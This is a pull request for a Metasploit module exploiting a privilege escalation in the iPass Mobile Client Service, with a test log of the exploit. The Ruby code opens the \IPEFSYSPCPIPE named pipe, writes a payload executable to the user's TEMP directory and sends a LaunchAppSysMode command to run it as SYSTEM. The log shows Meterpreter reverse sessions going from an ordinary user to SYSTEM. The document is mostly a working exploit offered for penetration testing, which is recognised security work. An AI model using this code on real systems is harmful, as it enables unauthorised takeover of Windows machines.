### PR TITLE
iPass Service Local Privilege Escalation Module (MSA-2015-03)

### DIFF
--- a/modules/exploits/windows/local/ipass_local_privesc.rb
+++ b/modules/exploits/windows/local/ipass_local_privesc.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
       'Description'     => %q{
         The named pipe, \IPEFSYSPCPIPE, can be accessed by normal users to interact
         with the iPass service. The service provides a LaunchAppSysMode command which
-        allows to execute abitrary commands as SYSTEM.
+        allows to execute arbitrary commands as SYSTEM.
 
       },
       'License'         => MSF_LICENSE,

--- a/modules/exploits/windows/local/ipass_local_privesc.rb
+++ b/modules/exploits/windows/local/ipass_local_privesc.rb
@@ -1,0 +1,179 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Services
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'            => 'iPass Mobile Client Service Privilege Escalation',
+      'Description'     => %q{
+        The named pipe, \IPEFSYSPCPIPE, can be accessed by normal users to interact
+        with the iPass service. The service provides a LaunchAppSysMode command which
+        allows to execute abitrary commands as SYSTEM.
+
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'h0ng10',     # Vulnerability discovery, metasploit module
+        ],
+      'Arch'            => ARCH_X86,
+      'Platform'        => 'win',
+      'SessionTypes'    => [ 'meterpreter' ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC'    => 'thread',
+        },
+      'Targets'         =>
+        [
+          [ 'Windows', { } ]
+        ],
+      'Payload'         =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'References'      =>
+        [
+          [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt' ],
+        ],
+      'DisclosureDate' => 'Mar 12 2015',
+      'DefaultTarget'  => 0
+    }))
+
+    register_options([
+      OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ])
+    ], self.class)
+
+  end
+
+  def check
+    os = sysinfo["OS"]
+    if os =~ /windows/i
+      svc = service_info 'iPlatformService'
+      if svc and svc[:display] =~ /iPlatformService/
+        vprint_good("Found service '#{svc[:display]}'")
+        begin
+          if is_running?
+            vprint_good("Service is running")
+          else
+            vprint_error("Service is not running!")
+          end
+        rescue RuntimeError => e
+          vprint_error("Unable to retrieve service status")
+          return Exploit::CheckCode::Unknown
+        end
+
+        vprint_good("Opening named pipe...")
+        handle = open_named_pipe("\\\\.\\pipe\\IPEFSYSPCPIPE")
+
+        if handle.nil?
+            fail_with(Failure::NoTarget, "\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found")
+        else
+            vprint_good("\\\\.\\pipe\\IPEFSYSPCPIPE found!")
+            session.railgun.kernel32.CloseHandle(handle)
+        end
+
+        return Exploit::CheckCode::Vulnerable
+
+      else
+        return Exploit::CheckCode::Safe
+      end
+    end
+  end
+
+
+  def open_named_pipe(pipe)
+    invalid_handle_value = 0xFFFFFFFF
+
+    r = session.railgun.kernel32.CreateFileA(pipe, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL", 0)
+    handle = r['return']
+
+    return nil if handle == invalid_handle_value
+
+    return handle
+  end
+
+  def write_named_pipe(handle, command)
+
+    buffer = Rex::Text.to_unicode(command)
+    w = client.railgun.kernel32.WriteFile(handle, buffer, buffer.length, 4, nil)
+
+    if w['return'] == false
+        print_error("The was an error writing to pipe, check permissions")
+        return nil
+    end
+  end
+
+
+  def is_running?
+    begin
+      status = service_status('iPlatformService')
+      return (status and status[:state] == 4)
+    rescue RuntimeError => e
+      print_error("Unable to retrieve service status")
+      return false
+    end
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
+
+    handle = open_named_pipe("\\\\.\\pipe\\IPEFSYSPCPIPE")
+
+    if handle.nil?
+        fail_with(Failure::NoTarget, "\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found")
+    else
+        print_status("Opended \\\\.\\pipe\\IPEFSYSPCPIPE! Proceeding...")
+    end
+
+    if datastore["WritableDir"] and not datastore["WritableDir"].empty?
+        temp_dir = datastore["WritableDir"]
+    else
+        temp_dir = client.sys.config.getenv('TEMP')
+    end
+
+    print_status("Using #{temp_dir} to drop malicious exe")
+
+    begin
+        cd(temp_dir)
+    rescue Rex::Post::Meterpreter::RequestError
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Config, "Failed to use the #{temp_dir} directory")
+    end
+
+    print_status("Writing malicious exe to remote filesystem")
+    write_path = pwd
+    exe_name = "#{rand_text_alpha(10 + rand(10))}.exe"
+
+    begin
+      write_file(exe_name, generate_payload_exe)
+      register_file_for_cleanup("#{write_path}\\#{exe_name}")
+    rescue Rex::Post::Meterpreter::RequestError
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Config, "Failed to drop payload into #{temp_dir}")
+    end
+
+    print_status("Sending LauchAppSysMode command")
+
+    begin
+      write_named_pipe(handle, "iPass.EventsAction.LaunchAppSysMode #{write_path}\\#{exe_name};;;")
+    rescue Rex::Post::Meterpreter::RequestError
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Config, "Failed to write to pipe")
+    end
+
+  end
+
+end


### PR DESCRIPTION
This module exploits a local privilege escalation vulnerability in the iPass Mobile Client Service. The service provides a named pipe (IPEFSYSPCPIPE), can be accessed by normal users to interact with the service. One of the available commands is LaunchAppSysMode which allows to execute arbitrary commands as SYSTEM.

I discovered this vulnerability while writing the exploit for CVE-2015-0925. Unfortunately I don't have a up2date version of the iPass client. However, iPass won't fix this issue (works as designed, see advisory MSA-2015-03), therefore I think that this can still be exploited locally with the latest iPass version.

If you have any questions, please let me know.
# Test

```
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.178.1:4444
[*] Starting the payload handler...
[*] Sending stage (972288 bytes) to 192.168.178.190
[*] Meterpreter session 1 opened (192.168.178.1:4444 -> 192.168.178.190:53454) at 2015-03-13 20:49:56 +0100

meterpreter > getuid
Server username: Win7-Work\mogwai
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeShutdownPrivilege
  SeChangeNotifyPrivilege
  SeUndockPrivilege
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ipass_local_privesc
msf exploit(ipass_local_privesc) > set session 1
session => 1
msf exploit(ipass_local_privesc) > exploit

[*] Started reverse handler on 192.168.25.22:4444
[*] Opended \\.\pipe\IPEFSYSPCPIPE! Proceeding...
[*] Using C:\Users\mogwai\AppData\Local\Temp to drop malicious exe
[*] Writing malicious exe to remote filesystem
[*] Sending LauchAppSysMode command
[*] Sending stage (770048 bytes) to 192.168.25.22
[*] Meterpreter session 2 opened (192.168.25.22:4444 -> 192.168.25.22:49976) at 2015-03-13 20:50:57 +0100
[*] Waiting 0s before file cleanup...
[!] This exploit may require manual cleanup of 'C:\Users\mogwai\AppData\Local\Temp\YoVmMXRNzGmtc.exe' on the target

meterpreter > getuid
Server username: $U$NTAUTORITT\SYSTEM-0x4e542d4155544f524954c4545c53595354454d
meterpreter >
```
